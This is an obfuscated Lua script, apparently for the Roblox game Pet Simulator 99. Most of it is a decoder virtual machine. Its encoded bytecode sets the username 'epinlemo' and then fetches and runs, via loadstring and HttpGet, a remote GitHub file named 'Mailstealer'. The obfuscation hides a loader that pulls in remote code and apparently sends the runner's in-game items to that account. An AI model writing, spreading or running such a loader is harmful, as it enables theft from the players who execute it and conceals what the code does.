--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v79=0;while true do if (v79==0) then v19=v0(v3(v30,1,1));return "";end end else local v80=0;local v81;while true do if (v80==0) then v81=v2(v0(v30,16));if v19 then local v104=0;local v105;while true do if (v104==1) then return v105;end if (v104==0) then v105=v5(v81,v19);v19=nil;v104=1;end end else return v81;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v82=(v31/((5 -3)^(v32-1)))%((5 -3)^(((v33-(1 -0)) -(v32-1)) + (2 -1))) ;return v82-(v82%((1497 -(282 + 595)) -(555 + 64))) ;else local v83=931 -(857 + 74) ;local v84;while true do if (v83==(568 -(367 + (1838 -(1523 + 114))))) then v84=(929 -(214 + 713))^(v32-(1 + 0 + 0)) ;return (((v31%(v84 + v84))>=v84) and 1) or (0 + 0) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (2 -0) );v18=v18 + (1067 -(68 + 997)) ;return (v36 * (1526 -(226 + 1044))) + v35 ;end local function v23()local v37=0 -0 ;local v38;local v39;local v40;local v41;while true do if (v37==(0 -0)) then v38,v39,v40,v41=v1(v16,v18,v18 + (120 -(32 + (155 -70))) );v18=v18 + 4 + 0 ;v37=1;end if (v37==((351 -(87 + 263)) + 0)) then return (v41 * (16778173 -(892 + 65))) + (v40 * (156337 -90801)) + (v39 * 256) + v38 ;end end end local function v24()local v42=v23();local v43=v23();local v44=181 -(67 + 113) ;local v45=(v20(v43,1 + 0 ,49 -29 ) * ((2 + 0)^32)) + v42 ;local v46=v20(v43,(874 -(368 + 423)) -(194 -132) ,(1001 -(10 + 8)) -(802 + 150) );local v47=((v20(v43,85 -53 )==((3 -2) -0)) and  -1) or (1 + 0) ;if (v46==0) then if (v45==(997 -((1357 -(416 + 26)) + 82))) then return v47 * (0 -0) ;else local v92=0 + 0 ;while true do if (v92==(0 -0)) then v46=1188 -(1069 + 118) ;v44=0 -0 ;break;end end end elseif (v46==2047) then return ((v45==(0 -0)) and (v47 * ((1 + 0)/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-1023 ) * (v44 + (v45/((3 -1)^(52 + 0)))) ;end local function v25(v48)local v49=0;local v50;local v51;while true do if (v49==(1 + 0)) then v50=v3(v16,v18,(v18 + v48) -(1 -0) );v18=v18 + v48 ;v49=440 -(145 + 293) ;end if (v49==(433 -(44 + 386))) then return v6(v51);end if (v49==2) then v51={};for v93=1487 -(998 + 488) , #v50 do v51[v93]=v2(v1(v3(v50,v93,v93)));end v49=1 + 2 ;end if (v49==0) then v50=nil;if  not v48 then local v99=0 -0 ;while true do if (v99==(0 + 0)) then v48=v23();if (v48==(772 -(201 + 571))) then return "";end break;end end end v49=1139 -(116 + 1022) ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=156 -(142 + 14) ;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v52==0) then local v87=1793 -(1563 + 230) ;while true do if (v87==(285 -(134 + 151))) then local v102=1665 -(970 + 695) ;while true do if (v102~=0) then else v53={};v54={};v102=1 -0 ;end if (v102==1) then v87=1991 -(582 + 1408) ;break;end end end if (v87~=(3 -2)) then else v55={};v52=1 -0 ;break;end end end if (v52==(7 -5)) then local v88=1824 -(1195 + 629) ;while true do if (v88==(0 -0)) then for v106=242 -(187 + 54) ,v57 do local v107=0;local v108;local v109;local v110;local v111;while true do if (v107~=(781 -(162 + 618))) then else v110=nil;v111=nil;v107=2 + 0 ;end if (v107==0) then v108=0 + 0 ;v109=nil;v107=1 -0 ;end if (v107==2) then while true do if (v108==1) then v111=nil;while true do if (v109==(0 -0)) then local v159=0 + 0 ;local v160;while true do if (v159~=(1636 -(1373 + 263))) then else v160=1000 -(451 + 549) ;while true do if (v160==(0 + 0)) then local v191=0 -0 ;while true do if ((1 -0)==v191) then v160=1385 -(746 + 638) ;break;end if ((0 + 0)==v191) then v110=v21();v111=nil;v191=1;end end end if ((1 -0)~=v160) then else v109=1;break;end end break;end end end if (v109==1) then if (v110==1) then v111=v21()~=(341 -(218 + 123)) ;elseif (v110==2) then v111=v24();elseif (v110~=(1584 -(1535 + 46))) then else v111=v25();end v58[v106]=v111;break;end end break;end if (v108==0) then local v119=0;while true do if (v119==0) then v109=0;v110=nil;v119=1 + 0 ;end if (v119~=(1 + 0)) then else v108=1;break;end end end end break;end end end v56[3]=v21();v88=1;end if (v88==(561 -(306 + 254))) then for v112=1,v23() do local v113=0;local v114;local v115;while true do if (v113==(1 + 0)) then while true do if (v114==(0 -0)) then v115=v21();if (v20(v115,1468 -(899 + 568) ,1 + 0 )==0) then local v137=0 -0 ;local v138;local v139;local v140;local v141;while true do if (v137==(605 -(268 + 335))) then while true do if (v138==0) then v139=v20(v115,292 -(60 + 230) ,575 -(426 + 146) );v140=v20(v115,1 + 3 ,6);v138=1457 -(282 + 1174) ;end if (v138==1) then v141={v22(),v22(),nil,nil};if (v139==(0 -0)) then local v192=0 + 0 ;local v193;local v194;while true do if (v192==(1025 -(706 + 318))) then while true do if (0==v193) then v194=1251 -(721 + 530) ;while true do if (v194==0) then v141[3]=v22();v141[1275 -(945 + 326) ]=v22();break;end end break;end end break;end if (v192==(0 -0)) then v193=0;v194=nil;v192=1 + 0 ;end end elseif (v139==(701 -(271 + 429))) then v141[3 + 0 ]=v23();elseif (v139==2) then v141[3]=v23() -((1502 -(1408 + 92))^16) ;elseif (v139~=(1089 -(461 + 625))) then else local v200=1288 -(993 + 295) ;local v201;local v202;while true do if (v200~=0) then else v201=0;v202=nil;v200=1 + 0 ;end if (v200==(1172 -(418 + 753))) then while true do if (v201~=(0 + 0)) then else v202=0 + 0 ;while true do if ((0 + 0)~=v202) then else v141[1 + 2 ]=v23() -(2^(545 -(406 + 123))) ;v141[1773 -(1749 + 20) ]=v22();break;end end break;end end break;end end end v138=1 + 1 ;end if (v138==(1324 -(1249 + 73))) then local v189=0 + 0 ;while true do if (v189~=(1145 -(466 + 679))) then else local v197=0 -0 ;while true do if (v197~=0) then else if (v20(v140,2 -1 ,1901 -(106 + 1794) )~=1) then else v141[1 + 1 ]=v58[v141[1 + 1 ]];end if (v20(v140,5 -3 ,2)~=1) then else v141[7 -4 ]=v58[v141[117 -(4 + 110) ]];end v197=1;end if (v197~=(585 -(57 + 527))) then else v189=1428 -(41 + 1386) ;break;end end end if ((104 -(17 + 86))~=v189) then else v138=3;break;end end end if (v138==(3 + 0)) then if (v20(v140,3,3)~=1) then else v141[4]=v58[v141[8 -4 ]];end v53[v112]=v141;break;end end break;end if (v137~=1) then else v140=nil;v141=nil;v137=5 -3 ;end if (v137~=(166 -(122 + 44))) then else v138=0 -0 ;v139=nil;v137=3 -2 ;end end end break;end end break;end if (v113~=(0 + 0)) then else local v118=0;while true do if (v118~=(1 + 0)) then else v113=1;break;end if (v118~=(0 -0)) then else local v120=0;while true do if ((65 -(30 + 35))==v120) then v114=0;v115=nil;v120=1 + 0 ;end if (v120==1) then v118=1;break;end end end end end end end v52=3;break;end end end if ((1260 -(1043 + 214))~=v52) then else local v89=0;while true do if (v89~=(0 -0)) then else for v116=1,v23() do v54[v116-(1213 -(323 + 889)) ]=v28();end return v56;end end end if ((2 -1)==v52) then local v90=0;local v91;while true do if (v90==(580 -(361 + 219))) then v91=320 -(53 + 267) ;while true do if (1~=v91) then else v58={};v52=2;break;end if (v91==0) then v56={v53,v54,nil,v55};v57=v23();v91=3 -2 ;end end break;end end end end end local function v29(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v65=v62;local v66=v63;local v67=v64;local v68=v27;local v69=1;local v70= -1;local v71={};local v72={...};local v73=v12("#",...) -1 ;local v74={};local v75={};for v85=0,v73 do if (v85>=v67) then v71[v85-v67 ]=v72[v85 + 1 ];else v75[v85]=v72[v85 + 1 ];end end local v76=(v73-v67) + 1 ;local v77;local v78;while true do local v86=0;while true do if (v86==0) then v77=v65[v69];v78=v77[1];v86=1;end if (v86==1) then if (v78<=10) then if (v78<=4) then if (v78<=1) then if (v78>0) then v75[v77[2]]();elseif ((v77[3]=="_ENV") or (v77[3]=="getfenv")) then v75[v77[2]]=v61;else v75[v77[2]]=v61[v77[3]];end elseif (v78<=2) then local v121=0;local v122;local v123;while true do if (v121==1) then v75[v122 + 1 ]=v123;v75[v122]=v123[v77[4]];break;end if (v121==0) then v122=v77[2];v123=v75[v77[3]];v121=1;end end elseif (v78==3) then if (v75[v77[2]]==v77[4]) then v69=v69 + 1 ;else v69=v77[3];end elseif ((v77[3]=="_ENV") or (v77[3]=="getfenv")) then v75[v77[2]]=v61;else v75[v77[2]]=v61[v77[3]];end elseif (v78<=7) then if (v78<=5) then v69=v77[3];elseif (v78>6) then v75[v77[2]]();else local v145=v77[2];v75[v145]=v75[v145](v13(v75,v145 + 1 ,v70));end elseif (v78<=8) then local v125=v77[2];v75[v125]=v75[v125](v13(v75,v125 + 1 ,v70));elseif (v78>9) then v75[v77[2]]=v77[3];elseif (v75[v77[2]]==v77[4]) then v69=v69 + 1 ;else v69=v77[3];end elseif (v78<=15) then if (v78<=12) then if (v78>11) then do return;end else local v127=0;local v128;local v129;while true do if (v127==1) then v75[v128 + 1 ]=v129;v75[v128]=v129[v77[4]];break;end if (v127==0) then v128=v77[2];v129=v75[v77[3]];v127=1;end end end elseif (v78<=13) then do return;end elseif (v78>14) then local v149=0;local v150;local v151;local v152;local v153;while true do if (v149==2) then for v186=v150,v70 do v153=v153 + 1 ;v75[v186]=v151[v153];end break;end if (v149==0) then v150=v77[2];v151,v152=v68(v75[v150](v13(v75,v150 + 1 ,v77[3])));v149=1;end if (v149==1) then v70=(v152 + v150) -1 ;v153=0;v149=2;end end else v61[v77[3]]=v75[v77[2]];end elseif (v78<=18) then if (v78<=16) then v75[v77[2]]=v77[3];elseif (v78==17) then for v172=v77[2],v77[3] do v75[v172]=nil;end else v69=v77[3];end elseif (v78<=19) then local v132=0;local v133;local v134;local v135;local v136;while true do if (v132==1) then v70=(v135 + v133) -1 ;v136=0;v132=2;end if (0==v132) then v133=v77[2];v134,v135=v68(v75[v133](v13(v75,v133 + 1 ,v77[3])));v132=1;end if (2==v132) then for v182=v133,v70 do v136=v136 + 1 ;v75[v182]=v134[v136];end break;end end elseif (v78==20) then for v175=v77[2],v77[3] do v75[v175]=nil;end else v61[v77[3]]=v75[v77[2]];end v69=v69 + 1 ;break;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!073O00028O0003083O00557365726E616D6503083O006570696E6C656D6F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034B3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F45676F72696B7573612F50657453696D756C61746F722O392F6D61696E2F4D61696C737465616C657200153O0012103O00014O0014000100013O0026093O0002000100010004123O00020001001210000100013O00260900010005000100010004123O00050001001210000200033O00120E000200023O00122O000200043O00122O000300053O002002000300030006001210000500074O0013000300054O000800023O00022O00070002000100010004123O001400010004123O000500010004123O001400010004123O000200012O000D3O00017O00",v9(),...);
